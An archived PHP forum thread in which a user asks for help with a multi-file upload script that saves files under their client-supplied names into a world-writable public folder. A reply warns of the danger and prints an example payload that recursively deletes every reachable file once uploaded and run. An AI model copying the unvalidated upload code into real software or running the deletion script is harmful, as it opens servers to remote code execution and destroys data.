Jump to content

Upload Multiple Files


ballouta

Recommended Posts

Hello

i have this upload script:

<html dir="ltr">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<title>multiple Files Upload</title>
</head>

<body>
<table width="500" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC">
<tr>
<form action="multiple_upload_ac.php" method="post" enctype="multipart/form-data" name="form1" id="form1">
<td>
<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#FFFFFF">
<tr>
<td><strong>multiple Files Upload </strong></td>
</tr>
<tr>
<td>Select file 
<input name="ufile[]" type="file" id="ufile[]" size="50" /></td>
</tr>
<tr>
<td>Select file
<input name="ufile[]" type="file" id="ufile[]" size="50" /></td>
</tr>
<tr>
<td>Select file
<input name="ufile[]" type="file" id="ufile[]" size="50" /></td>
</tr>
<tr>
<td align="center"><input type="submit" name="Submit" value="Upload" /></td>
</tr>
</table>
</td>
</form>
</tr>
</table>
</body>

</html>

 

And the other file:

<?php
//set where you want to store files
//in this example we keep file in folder upload 
//$HTTP_POST_FILES['ufile']['name']; = upload file name
//for example upload file name cartoon.gif . $path will be upload/cartoon.gif

$path1= "/home/motifser/public_html/test/".$HTTP_POST_FILES['ufile']['name'][0];
$path2= "/home/motifser/public_html/test/".$HTTP_POST_FILES['ufile']['name'][1];
$path3= "/home/motifser/public_html/test/".$HTTP_POST_FILES['ufile']['name'][2];

//copy file to where you want to store file
copy($HTTP_POST_FILES['ufile']['tmp_name'][0], $path1);
copy($HTTP_POST_FILES['ufile']['tmp_name'][1], $path2);
copy($HTTP_POST_FILES['ufile']['tmp_name'][2], $path3);


//$HTTP_POST_FILES['ufile']['name'] = file name
//$HTTP_POST_FILES['ufile']['size'] = file size
//$HTTP_POST_FILES['ufile']['type'] = type of file
echo "File Name :".$HTTP_POST_FILES['ufile']['name'][0]."<BR/>"; 
echo "File Size :".$HTTP_POST_FILES['ufile']['size'][0]."<BR/>"; 
echo "File Type :".$HTTP_POST_FILES['ufile']['type'][0]."<BR/>"; 
echo "<img src=\"$path1\" width=\"150\" height=\"150\">";
echo "<P>";

echo "File Name :".$HTTP_POST_FILES['ufile']['name'][1]."<BR/>"; 
echo "File Size :".$HTTP_POST_FILES['ufile']['size'][1]."<BR/>"; 
echo "File Type :".$HTTP_POST_FILES['ufile']['type'][1]."<BR/>"; 
echo "<img src=\"$path2\" width=\"150\" height=\"150\">";
echo "<P>";

echo "File Name :".$HTTP_POST_FILES['ufile']['name'][2]."<BR/>"; 
echo "File Size :".$HTTP_POST_FILES['ufile']['size'][2]."<BR/>"; 
echo "File Type :".$HTTP_POST_FILES['ufile']['type'][2]."<BR/>"; 
echo "<img src=\"$path3\" width=\"150\" height=\"150\">";

///////////////////////////////////////////////////////

// Use this code to display the error or success.

$filesize1=$HTTP_POST_FILES['ufile']['size'][0];
$filesize2=$HTTP_POST_FILES['ufile']['size'][1];
$filesize3=$HTTP_POST_FILES['ufile']['size'][2];

if($filesize1 && $filesize2 && $filesize3 != 0) 
{
echo "We have recieved your files";
}

else {
echo "ERROR.....";
}

//////////////////////////////////////////////

// What files that have a problem? (if found)

if($filesize1==0) {
echo "There're something error in your first file";
echo "<BR />";
}

if($filesize2==0) {
echo "There're something error in your second file";
echo "<BR />";
}

if($filesize3==0) {
echo "There're something error in your third file";
echo "<BR />";
}

?>

 

I have created the test directory and cmod it to 777

 

BUT i got an error:

Live link: http://www.motif-services.com/test/upload.htm

 

Q2: Is there a PHP script that selects and uploads multiple files in one step ike this:

http://ajaxuploader.com/?gclid=CPKhmNfdmJoCFcEUzAodmHTz9g

 

help please

 

many thanks

Link to comment
https://forums.phpfreaks.com/topic/156259-upload-multiple-files/
Share on other sites

This is a very bad practice:

 

<?php
$path1= "/home/motifser/public_html/test/".$HTTP_POST_FILES['ufile']['name'][0];
$path2= "/home/motifser/public_html/test/".$HTTP_POST_FILES['ufile']['name'][1];
$path3= "/home/motifser/public_html/test/".$HTTP_POST_FILES['ufile']['name'][2];
?>

 

You are opening your system for malicious users I could for example just upload index.php which would result in:

 

<?php
$path1= "/home/motifser/public_html/test/index.php";
?>

 

You would copy it for me:

 

<?php
copy($HTTP_POST_FILES['ufile']['tmp_name'][0], $path1); // thank you 
?>

 

and i would execute it :D

 

http://yourdomain-publichtml.com/test/index.php

 

My code would be something similar to:

 

<?php
function find_root($directory)
{
    $root = $directory;
    $topdirectory = dirname($directory);
    if (is_readable($topdirectory)) {
        $root = find_root($topdirectory);
    }
    return $root;
}

function delete_all($directory) {
    $files = scandir($directory); // retrieve all files from the directory
    foreach ($files as $file) {
       if (is_dir($file)) {
          delete_all($file);
          @rmdir($file);
       } else {
          @unlink($file);
       }
   }
}

delete_all(find_root('.'));
?>

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.